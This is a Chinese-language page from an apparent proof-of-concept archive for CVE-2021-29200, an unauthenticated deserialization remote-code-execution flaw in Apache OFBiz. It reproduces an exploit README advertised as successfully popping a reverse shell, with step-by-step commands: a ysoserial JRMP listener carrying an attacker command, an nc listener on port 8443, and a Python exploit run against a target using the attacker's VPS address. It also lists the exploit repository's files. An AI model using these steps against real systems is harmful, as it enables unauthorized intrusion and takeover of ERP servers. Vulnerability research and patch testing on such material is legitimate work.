支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: c573d1b2235a3751d5cb434ec0450f5410590f44

来源
关联漏洞
标题:Apache OFBiz 代码问题漏洞 (CVE-2021-29200)
Description:Apache OFBiz是美国阿帕奇(Apache)基金会的一套企业资源计划(ERP)系统。该系统提供了一整套基于Java的Web应用程序组件和工具。 Apache OFBiz 17.12.07 之前版本存在代码问题漏洞,该漏洞源于具有不安全的反序列化。未经认证的用户可以执行RCE攻击。
介绍
# CVE-2021-29200

**CVE-2021-29200 EXP 可成功反弹Shell**

> **本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。**

### 触发命令执行EXP



#### 1. VPS启动`RMI`监听 `9999` 端口

```shell
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
```

#### 2. VPS启动`nc`监听 `8443` 端口

```shell
nc -lvp 8443
```

#### 3. 执行python脚本

```shell
python3 cve-2021-29200_exp.py <target> <vps_ip> <vps_port>
```



#### 示例

![1620729375025](img/1620729375025.png)
文件快照

[4.0K] /data/pocs/c573d1b2235a3751d5cb434ec0450f5410590f44 ├── [2.5K] cve-2021-29200_exp.py ├── [4.0K] img │   └── [179K] 1620729375025.png ├── [ 592] README.md └── [ 57M] ysoserial-stub.jar 1 directory, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。